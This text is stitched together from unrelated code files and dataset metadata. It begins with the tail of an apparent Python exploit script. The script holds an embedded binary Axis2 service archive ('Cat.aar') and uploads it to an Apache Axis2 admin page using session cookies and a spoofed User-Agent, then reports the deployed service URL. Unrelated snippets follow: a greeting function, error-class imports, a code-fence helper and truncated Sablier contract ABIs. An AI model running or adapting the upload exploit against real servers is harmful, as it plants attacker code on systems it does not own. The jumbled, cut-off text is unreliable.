\x08\x00\xFA\x73\x6C\x45\x23\xFC\x37\xC9\xDA\x00\x00\x00\xC5\x01\x00\x00\x15\x00\x00\x00\x4D\x45\x54\x41\x2D\x49\x4E\x46\x2F\x73\x65\x72\x76\x69\x63\x65\x73\x2E\x78\x6D\x6C\x8D\x91\xC1\x6A\xC3\x30\x10\x44\xCF\xF1\x57\x08\xDD\xAB\x35\x69\x0F\xA5\xC8\xBE\xF8\x94\x43\x69\x48\xFB\x03\x8B\xB2\xC4\x02\x5B\x16\xBB\x4A\x54\xFF\x7D\x65\xD2\x94\x26\xE4\x90\xA3\xC4\xCC\xBE\x61\xC6\x0A\xF1\xC9\x3B\x52\x01\x47\x6A\x74\x87\x49\xAB\xB6\x5A\xD9\x3D\x89\x63\x1F\x93\x9F\x42\x79\xAE\xB6\x03\xA1\x90\xFA\x9A\x23\xA9\x79\x3A\xB2\xBA\xD8\xFE\xE9\x54\x4F\x4C\xC5\x0A\xD7\x5E\x3B\x92\x08\x1E\x68\x47\x8E\xFC\x89\x58\x96\x7B\xB7\x9F\x6A\xA4\xD8\xE8\x3E\xA5\xF8\x06\x90\x73\x36\xF9\xD9\x4C\x7C\x80\x75\x5D\xBF\x40\xFD\x0A\x59\xF6\x03\xF8\xF0\x34\x85\x61\xD6\xCA\x0D\x28\xD2\xE8\x22\x30\x18\xD1\xF5\x64\xF0\xDB\xCB\xDA\x70\x74\x86\x2F\x18\xB3\xDB\x76\x9B\xF0\x51\x0C\xEF\xD7\x2C\xAD\xE0\x6E\x84\x87\x33\x1C\x4B\x47\x8F\x67\xB8\xA5\x2F\x70\x0B\x77\x4A\xB1\x11\xB9\x8C\x90\x4A\x94\xF3\x18\x9F\xE7\x8E\xBB\x85\xA4\xDB\x32\x8D\x85\x3F\x49\x5B\x59\xF8\xDD\xA0\xAD\x7E\x00\x50\x4B\x01\x02\x14\x03\x0A\x00\x00\x08\x00\x00\xFB\x73\x6C\x45\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x04\x00\x00\x00\x00\x00\x00\x00\x10\x00\xED\x41\x00\x00\x00\x00\x4D\x45\x54\x41\x2D\x49\x4E\x46\x2F\xFE\xCA\x00\x00\x50\x4B\x01\x02\x14\x03\x0A\x00\x00\x08\x08\x00\xFA\x73\x6C\x45\x45\x93\x1C\x16\x5A\x00\x00\x00\x67\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81\x2B\x00\x00\x00\x4D\x45\x54\x41\x2D\x49\x4E\x46\x2F\x4D\x41\x4E\x49\x46\x45\x53\x54\x2E\x4D\x46\x50\x4B\x01\x02\x14\x03\x0A\x00\x00\x08\x00\x00\xFA\x73\x6C\x45\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xED\x41\xB7\x00\x00\x00\x6C\x69\x62\x2F\x50\x4B\x01\x02\x14\x03\x0A\x00\x00\x08\x08\x00\xFA\x73\x6C\x45\x59\x1F\x55\xA8\xA1\x0C\x00\x00\xD7\x19\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81\xD9\x00\x00\x00\x43\x61\x74\x2E\x63\x6C\x61\x73\x73\x50\x4B\x01\x02\x14\x03\x0A\x00\x00
\x08\x08\x00\xFA\x73\x6C\x45\x23\xFC\x37\xC9\xDA\x00\x00\x00\xC5\x01\x00\x00\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81\xA1\x0D\x00\x00\x4D\x45\x54\x41\x2D\x49\x4E\x46\x2F\x73\x65\x72\x76\x69\x63\x65\x73\x2E\x78\x6D\x6C\x50\x4B\x05\x06\x00\x00\x00\x00\x05\x00\x05\x00\x29\x01\x00\x00\xAE\x0E\x00\x00\x00\x00"
data.append('--%s' % boundary)
data.append('Content-Disposition: form-data; name="filename"; filename="Cat.aar"')
data.append('Content-Type: application/octet-stream\r\n')
data.append(aar_file)
data.append('--%s--\r\n' % boundary)
http_body = '\r\n'.join(data)
try:
req = urllib2.Request(upload_url, data=http_body)
req.add_header('Content-Type', 'multipart/form-data; boundary=%s' % boundary)
req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0')
req.add_header('Referer',upload_url)
req.add_header('Cookie',cookies)
req.add_header('Content-Length',len(http_body))
res_html = urllib2.urlopen(req, timeout=timeout).read()
if "File Cat.aar successfully uploaded" in res_html:
return " Auto deploy success:http://%s:%s/axis2/services/Cat?wsdl"%(host,port)
except Exception,e:
return 'NO'
| 650.333333
| 16,326
| 0.740817
| 4,246
| 17,559
| 3.060057
| 0.080546
| 0.067883
| 0.067883
| 0.067421
| 0.117987
| 0.117987
| 0.117987
| 0.117987
| 0.117987
| 0.115216
| 0
| 0.317127
| 0.013725
| 17,559
| 27
| 16,327
| 650.333333
| 0.433133
| 0.001936
| 0
| 0
| 0
| 0.08
| 0.957824
| 0.937421
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0.04
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d7345af0218e03741a6ce2c19832a96117f3f243
| 39
|
py
|
Python
|
module_folder/module_file.py
|
nheske/learn-python
|
0f430ffa232103419669cec78202e9f2e74f7f6c
|
[
"MIT"
] | null | null | null |
module_folder/module_file.py
|
nheske/learn-python
|
0f430ffa232103419669cec78202e9f2e74f7f6c
|
[
"MIT"
] | null | null | null |
module_folder/module_file.py
|
nheske/learn-python
|
0f430ffa232103419669cec78202e9f2e74f7f6c
|
[
"MIT"
] | null | null | null |
def say_hello():
    """Return the fixed greeting string ``"hello"``."""
    greeting = "hello"
    return greeting
| 6.5
| 18
| 0.589744
| 5
| 39
| 4.4
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.282051
| 39
| 5
| 19
| 7.8
| 0.785714
| 0
| 0
| 0
| 0
| 0
| 0.138889
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
d743f6a84de8e5caf4339038ccd9b7e5257b2938
| 145
|
py
|
Python
|
easycodef/errors/__init__.py
|
fiveio/easy-codef-py
|
97bd6831909e4d31af0ec7ed479b63fc977cd302
|
[
"MIT"
] | 1
|
2019-09-17T00:47:08.000Z
|
2019-09-17T00:47:08.000Z
|
easycodef/errors/__init__.py
|
fiveio/easy-codef-py
|
97bd6831909e4d31af0ec7ed479b63fc977cd302
|
[
"MIT"
] | null | null | null |
easycodef/errors/__init__.py
|
fiveio/easy-codef-py
|
97bd6831909e4d31af0ec7ed479b63fc977cd302
|
[
"MIT"
] | null | null | null |
from ._errors import Error
from ._errors import TokenGenerateError
from ._errors import ConnectedIdGenerateError
from ._errors import UseApiError
| 36.25
| 45
| 0.868966
| 16
| 145
| 7.625
| 0.4375
| 0.327869
| 0.52459
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103448
| 145
| 4
| 46
| 36.25
| 0.938462
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
ad16b6d8d14f4c70e7a7bb64095f062101bb1263
| 132
|
py
|
Python
|
bot/util/syntax.py
|
VoxelPrismatic/prizai
|
632a5dfed23807d78064d292d474ac4cc8988b12
|
[
"Unlicense"
] | 2
|
2019-11-08T21:34:44.000Z
|
2020-07-05T15:31:19.000Z
|
bot/util/syntax.py
|
VoxelPrismatic/prizai
|
632a5dfed23807d78064d292d474ac4cc8988b12
|
[
"Unlicense"
] | null | null | null |
bot/util/syntax.py
|
VoxelPrismatic/prizai
|
632a5dfed23807d78064d292d474ac4cc8988b12
|
[
"Unlicense"
] | 2
|
2020-07-05T15:39:51.000Z
|
2020-07-05T16:15:47.000Z
|
def code(st, syntax = ""): return f"```{syntax}\n{st}```"
def md(st): return code(st, "md")
def diff(st): return code(st, "diff")
| 22
| 57
| 0.583333
| 23
| 132
| 3.347826
| 0.391304
| 0.233766
| 0.311688
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.143939
| 132
| 5
| 58
| 26.4
| 0.681416
| 0
| 0
| 0
| 0
| 0
| 0.19697
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| false
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
ad18cc97c93d139215618d0ef2b30ddb182997b3
| 22,964
|
py
|
Python
|
safe_transaction_service/contracts/decoder_abis/sablier.py
|
kanhirun/safe-transaction-service
|
9bd6103be7d77469a337b6f02c8e0693e7951e4c
|
[
"MIT"
] | 5
|
2021-01-28T17:41:42.000Z
|
2021-11-14T17:09:18.000Z
|
safe_transaction_service/contracts/decoder_abis/sablier.py
|
kanhirun/safe-transaction-service
|
9bd6103be7d77469a337b6f02c8e0693e7951e4c
|
[
"MIT"
] | 8
|
2022-03-15T18:39:45.000Z
|
2022-03-28T01:28:13.000Z
|
safe_transaction_service/contracts/decoder_abis/sablier.py
|
kanhirun/safe-transaction-service
|
9bd6103be7d77469a337b6f02c8e0693e7951e4c
|
[
"MIT"
] | 5
|
2021-04-06T17:20:02.000Z
|
2022-01-13T10:58:08.000Z
|
sablier_ctoken_manager = [{'constant': True, 'inputs': [], 'name': 'owner', 'outputs': [{'internalType': 'address', 'name': '', 'type': 'address'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': True, 'inputs': [], 'name': 'isOwner', 'outputs': [{'internalType': 'bool', 'name': '', 'type': 'bool'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'address', 'name': 'sender', 'type': 'address'}], 'name': 'initialize', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'address', 'name': 'newOwner', 'type': 'address'}], 'name': 'transferOwnership', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'inputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'constructor'}, {'anonymous': False, 'inputs': [{'indexed': True, 'internalType': 'address', 'name': 'previousOwner', 'type': 'address'}, {'indexed': True, 'internalType': 'address', 'name': 'newOwner', 'type': 'address'}], 'name': 'OwnershipTransferred', 'type': 'event'}, {'anonymous': False, 'inputs': [{'indexed': True, 'internalType': 'address', 'name': 'tokenAddress', 'type': 'address'}], 'name': 'DiscardCToken', 'type': 'event'}, {'anonymous': False, 'inputs': [{'indexed': True, 'internalType': 'address', 'name': 'tokenAddress', 'type': 'address'}], 'name': 'WhitelistCToken', 'type': 'event'}, {'constant': False, 'inputs': [{'internalType': 'address', 'name': 'tokenAddress', 'type': 'address'}], 'name': 'whitelistCToken', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'address', 'name': 'tokenAddress', 'type': 'address'}], 'name': 'discardCToken', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': True, 'inputs': [{'internalType': 'address', 
'name': 'tokenAddress', 'type': 'address'}], 'name': 'isCToken', 'outputs': [{'internalType': 'bool', 'name': '', 'type': 'bool'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}]
sablier_payroll = [{'constant': True, 'inputs': [{'internalType': 'address', 'name': '', 'type': 'address'}, {'internalType': 'uint256', 'name': '', 'type': 'uint256'}], 'name': 'relayers', 'outputs': [{'internalType': 'bool', 'name': '', 'type': 'bool'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': True, 'inputs': [], 'name': 'sablier', 'outputs': [{'internalType': 'contract Sablier', 'name': '', 'type': 'address'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': True, 'inputs': [], 'name': 'getHubAddr', 'outputs': [{'internalType': 'address', 'name': '', 'type': 'address'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'bytes', 'name': 'context', 'type': 'bytes'}], 'name': 'preRelayedCall', 'outputs': [{'internalType': 'bytes32', 'name': '', 'type': 'bytes32'}], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': True, 'inputs': [], 'name': 'owner', 'outputs': [{'internalType': 'address', 'name': '', 'type': 'address'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': True, 'inputs': [], 'name': 'isOwner', 'outputs': [{'internalType': 'bool', 'name': '', 'type': 'bool'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': True, 'inputs': [], 'name': 'relayHubVersion', 'outputs': [{'internalType': 'string', 'name': '', 'type': 'string'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': True, 'inputs': [], 'name': 'nextSalaryId', 'outputs': [{'internalType': 'uint256', 'name': '', 'type': 'uint256'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'bytes', 'name': 'context', 'type': 'bytes'}, {'internalType': 'bool', 'name': 'success', 'type': 'bool'}, {'internalType': 'uint256', 'name': 'actualCharge', 'type': 'uint256'}, {'internalType': 
'bytes32', 'name': 'preRetVal', 'type': 'bytes32'}], 'name': 'postRelayedCall', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'address', 'name': 'newOwner', 'type': 'address'}], 'name': 'transferOwnership', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'anonymous': False, 'inputs': [{'indexed': True, 'internalType': 'uint256', 'name': 'salaryId', 'type': 'uint256'}, {'indexed': True, 'internalType': 'uint256', 'name': 'streamId', 'type': 'uint256'}, {'indexed': True, 'internalType': 'address', 'name': 'company', 'type': 'address'}], 'name': 'CreateSalary', 'type': 'event'}, {'anonymous': False, 'inputs': [{'indexed': True, 'internalType': 'uint256', 'name': 'salaryId', 'type': 'uint256'}, {'indexed': True, 'internalType': 'uint256', 'name': 'streamId', 'type': 'uint256'}, {'indexed': True, 'internalType': 'address', 'name': 'company', 'type': 'address'}], 'name': 'WithdrawFromSalary', 'type': 'event'}, {'anonymous': False, 'inputs': [{'indexed': True, 'internalType': 'uint256', 'name': 'salaryId', 'type': 'uint256'}, {'indexed': True, 'internalType': 'uint256', 'name': 'streamId', 'type': 'uint256'}, {'indexed': True, 'internalType': 'address', 'name': 'company', 'type': 'address'}], 'name': 'CancelSalary', 'type': 'event'}, {'anonymous': False, 'inputs': [{'indexed': True, 'internalType': 'address', 'name': 'oldRelayHub', 'type': 'address'}, {'indexed': True, 'internalType': 'address', 'name': 'newRelayHub', 'type': 'address'}], 'name': 'RelayHubChanged', 'type': 'event'}, {'anonymous': False, 'inputs': [{'indexed': True, 'internalType': 'address', 'name': 'previousOwner', 'type': 'address'}, {'indexed': True, 'internalType': 'address', 'name': 'newOwner', 'type': 'address'}], 'name': 'OwnershipTransferred', 'type': 'event'}, {'constant': False, 'inputs': [{'internalType': 'address', 'name': 'trustedSigner', 'type': 'address'}], 
'name': 'initialize', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'address', 'name': 'ownerAddress', 'type': 'address'}, {'internalType': 'address', 'name': 'signerAddress', 'type': 'address'}, {'internalType': 'address', 'name': 'sablierAddress', 'type': 'address'}], 'name': 'initialize', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': False, 'inputs': [], 'name': 'initialize', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'address', 'name': 'relayer', 'type': 'address'}, {'internalType': 'uint256', 'name': 'salaryId', 'type': 'uint256'}], 'name': 'whitelistRelayer', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'address', 'name': 'relayer', 'type': 'address'}, {'internalType': 'uint256', 'name': 'salaryId', 'type': 'uint256'}], 'name': 'discardRelayer', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': True, 'inputs': [{'internalType': 'address', 'name': 'relay', 'type': 'address'}, {'internalType': 'address', 'name': 'from', 'type': 'address'}, {'internalType': 'bytes', 'name': 'encodedFunction', 'type': 'bytes'}, {'internalType': 'uint256', 'name': 'transactionFee', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'gasPrice', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'gasLimit', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'nonce', 'type': 'uint256'}, {'internalType': 'bytes', 'name': 'approvalData', 'type': 'bytes'}, {'internalType': 'uint256', 'name': '', 'type': 'uint256'}], 'name': 'acceptRelayedCall', 'outputs': [{'internalType': 'uint256', 'name': '', 'type': 'uint256'}, {'internalType': 'bytes', 'name': '', 'type': 'bytes'}], 'payable': False, 
'stateMutability': 'view', 'type': 'function'}, {'constant': True, 'inputs': [{'internalType': 'uint256', 'name': 'salaryId', 'type': 'uint256'}], 'name': 'getSalary', 'outputs': [{'internalType': 'address', 'name': 'company', 'type': 'address'}, {'internalType': 'address', 'name': 'employee', 'type': 'address'}, {'internalType': 'uint256', 'name': 'salary', 'type': 'uint256'}, {'internalType': 'address', 'name': 'tokenAddress', 'type': 'address'}, {'internalType': 'uint256', 'name': 'startTime', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'stopTime', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'remainingBalance', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'rate', 'type': 'uint256'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'address', 'name': 'employee', 'type': 'address'}, {'internalType': 'uint256', 'name': 'salary', 'type': 'uint256'}, {'internalType': 'address', 'name': 'tokenAddress', 'type': 'address'}, {'internalType': 'uint256', 'name': 'startTime', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'stopTime', 'type': 'uint256'}], 'name': 'createSalary', 'outputs': [{'internalType': 'uint256', 'name': 'salaryId', 'type': 'uint256'}], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'address', 'name': 'employee', 'type': 'address'}, {'internalType': 'uint256', 'name': 'salary', 'type': 'uint256'}, {'internalType': 'address', 'name': 'tokenAddress', 'type': 'address'}, {'internalType': 'uint256', 'name': 'startTime', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'stopTime', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'senderSharePercentage', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'recipientSharePercentage', 'type': 'uint256'}], 'name': 'createCompoundingSalary', 'outputs': [{'internalType': 'uint256', 'name': 'salaryId', 'type': 
'uint256'}], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'uint256', 'name': 'salaryId', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'amount', 'type': 'uint256'}], 'name': 'withdrawFromSalary', 'outputs': [{'internalType': 'bool', 'name': 'success', 'type': 'bool'}], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'uint256', 'name': 'salaryId', 'type': 'uint256'}], 'name': 'cancelSalary', 'outputs': [{'internalType': 'bool', 'name': 'success', 'type': 'bool'}], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}]
sablier_abi = [{'constant': True, 'inputs': [], 'name': 'nextStreamId', 'outputs': [{'internalType': 'uint256', 'name': '', 'type': 'uint256'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': False, 'inputs': [], 'name': 'unpause', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': True, 'inputs': [{'internalType': 'address', 'name': 'account', 'type': 'address'}], 'name': 'isPauser', 'outputs': [{'internalType': 'bool', 'name': '', 'type': 'bool'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': True, 'inputs': [], 'name': 'paused', 'outputs': [{'internalType': 'bool', 'name': '', 'type': 'bool'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': False, 'inputs': [], 'name': 'initialize', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'address', 'name': 'account', 'type': 'address'}], 'name': 'addPauser', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': False, 'inputs': [], 'name': 'pause', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': True, 'inputs': [], 'name': 'owner', 'outputs': [{'internalType': 'address', 'name': '', 'type': 'address'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': True, 'inputs': [], 'name': 'isOwner', 'outputs': [{'internalType': 'bool', 'name': '', 'type': 'bool'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'address', 'name': 'sender', 'type': 'address'}], 'name': 'initialize', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': True, 'inputs': [], 'name': 'cTokenManager', 'outputs': [{'internalType': 'contract ICTokenManager', 'name': '', 'type': 
'address'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': True, 'inputs': [], 'name': 'fee', 'outputs': [{'internalType': 'uint256', 'name': 'mantissa', 'type': 'uint256'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'address', 'name': 'newOwner', 'type': 'address'}], 'name': 'transferOwnership', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'inputs': [{'internalType': 'address', 'name': 'cTokenManagerAddress', 'type': 'address'}], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'constructor'}, {'anonymous': False, 'inputs': [{'indexed': True, 'internalType': 'uint256', 'name': 'streamId', 'type': 'uint256'}, {'indexed': False, 'internalType': 'uint256', 'name': 'exchangeRate', 'type': 'uint256'}, {'indexed': False, 'internalType': 'uint256', 'name': 'senderSharePercentage', 'type': 'uint256'}, {'indexed': False, 'internalType': 'uint256', 'name': 'recipientSharePercentage', 'type': 'uint256'}], 'name': 'CreateCompoundingStream', 'type': 'event'}, {'anonymous': False, 'inputs': [{'indexed': True, 'internalType': 'uint256', 'name': 'streamId', 'type': 'uint256'}, {'indexed': False, 'internalType': 'uint256', 'name': 'senderInterest', 'type': 'uint256'}, {'indexed': False, 'internalType': 'uint256', 'name': 'recipientInterest', 'type': 'uint256'}, {'indexed': False, 'internalType': 'uint256', 'name': 'sablierInterest', 'type': 'uint256'}], 'name': 'PayInterest', 'type': 'event'}, {'anonymous': False, 'inputs': [{'indexed': True, 'internalType': 'address', 'name': 'tokenAddress', 'type': 'address'}, {'indexed': True, 'internalType': 'uint256', 'name': 'amount', 'type': 'uint256'}], 'name': 'TakeEarnings', 'type': 'event'}, {'anonymous': False, 'inputs': [{'indexed': True, 'internalType': 'uint256', 'name': 'fee', 'type': 'uint256'}], 'name': 'UpdateFee', 'type': 'event'}, {'anonymous': False, 'inputs': 
[{'indexed': False, 'internalType': 'address', 'name': 'account', 'type': 'address'}], 'name': 'Paused', 'type': 'event'}, {'anonymous': False, 'inputs': [{'indexed': False, 'internalType': 'address', 'name': 'account', 'type': 'address'}], 'name': 'Unpaused', 'type': 'event'}, {'anonymous': False, 'inputs': [{'indexed': True, 'internalType': 'address', 'name': 'account', 'type': 'address'}], 'name': 'PauserAdded', 'type': 'event'}, {'anonymous': False, 'inputs': [{'indexed': True, 'internalType': 'address', 'name': 'account', 'type': 'address'}], 'name': 'PauserRemoved', 'type': 'event'}, {'anonymous': False, 'inputs': [{'indexed': True, 'internalType': 'address', 'name': 'previousOwner', 'type': 'address'}, {'indexed': True, 'internalType': 'address', 'name': 'newOwner', 'type': 'address'}], 'name': 'OwnershipTransferred', 'type': 'event'}, {'anonymous': False, 'inputs': [{'indexed': True, 'internalType': 'uint256', 'name': 'streamId', 'type': 'uint256'}, {'indexed': True, 'internalType': 'address', 'name': 'sender', 'type': 'address'}, {'indexed': True, 'internalType': 'address', 'name': 'recipient', 'type': 'address'}, {'indexed': False, 'internalType': 'uint256', 'name': 'deposit', 'type': 'uint256'}, {'indexed': False, 'internalType': 'address', 'name': 'tokenAddress', 'type': 'address'}, {'indexed': False, 'internalType': 'uint256', 'name': 'startTime', 'type': 'uint256'}, {'indexed': False, 'internalType': 'uint256', 'name': 'stopTime', 'type': 'uint256'}], 'name': 'CreateStream', 'type': 'event'}, {'anonymous': False, 'inputs': [{'indexed': True, 'internalType': 'uint256', 'name': 'streamId', 'type': 'uint256'}, {'indexed': True, 'internalType': 'address', 'name': 'recipient', 'type': 'address'}, {'indexed': False, 'internalType': 'uint256', 'name': 'amount', 'type': 'uint256'}], 'name': 'WithdrawFromStream', 'type': 'event'}, {'anonymous': False, 'inputs': [{'indexed': True, 'internalType': 'uint256', 'name': 'streamId', 'type': 'uint256'}, {'indexed': 
True, 'internalType': 'address', 'name': 'sender', 'type': 'address'}, {'indexed': True, 'internalType': 'address', 'name': 'recipient', 'type': 'address'}, {'indexed': False, 'internalType': 'uint256', 'name': 'senderBalance', 'type': 'uint256'}, {'indexed': False, 'internalType': 'uint256', 'name': 'recipientBalance', 'type': 'uint256'}], 'name': 'CancelStream', 'type': 'event'}, {'constant': False, 'inputs': [{'internalType': 'uint256', 'name': 'feePercentage', 'type': 'uint256'}], 'name': 'updateFee', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'address', 'name': 'tokenAddress', 'type': 'address'}, {'internalType': 'uint256', 'name': 'amount', 'type': 'uint256'}], 'name': 'takeEarnings', 'outputs': [], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': True, 'inputs': [{'internalType': 'uint256', 'name': 'streamId', 'type': 'uint256'}], 'name': 'getStream', 'outputs': [{'internalType': 'address', 'name': 'sender', 'type': 'address'}, {'internalType': 'address', 'name': 'recipient', 'type': 'address'}, {'internalType': 'uint256', 'name': 'deposit', 'type': 'uint256'}, {'internalType': 'address', 'name': 'tokenAddress', 'type': 'address'}, {'internalType': 'uint256', 'name': 'startTime', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'stopTime', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'remainingBalance', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'ratePerSecond', 'type': 'uint256'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': True, 'inputs': [{'internalType': 'uint256', 'name': 'streamId', 'type': 'uint256'}], 'name': 'deltaOf', 'outputs': [{'internalType': 'uint256', 'name': 'delta', 'type': 'uint256'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': True, 'inputs': [{'internalType': 'uint256', 'name': 'streamId', 'type': 'uint256'}, 
{'internalType': 'address', 'name': 'who', 'type': 'address'}], 'name': 'balanceOf', 'outputs': [{'internalType': 'uint256', 'name': 'balance', 'type': 'uint256'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': True, 'inputs': [{'internalType': 'uint256', 'name': 'streamId', 'type': 'uint256'}], 'name': 'isCompoundingStream', 'outputs': [{'internalType': 'bool', 'name': '', 'type': 'bool'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': True, 'inputs': [{'internalType': 'uint256', 'name': 'streamId', 'type': 'uint256'}], 'name': 'getCompoundingStream', 'outputs': [{'internalType': 'address', 'name': 'sender', 'type': 'address'}, {'internalType': 'address', 'name': 'recipient', 'type': 'address'}, {'internalType': 'uint256', 'name': 'deposit', 'type': 'uint256'}, {'internalType': 'address', 'name': 'tokenAddress', 'type': 'address'}, {'internalType': 'uint256', 'name': 'startTime', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'stopTime', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'remainingBalance', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'ratePerSecond', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'exchangeRateInitial', 'type': 'uint256'}, {'internalType': 'uint256', 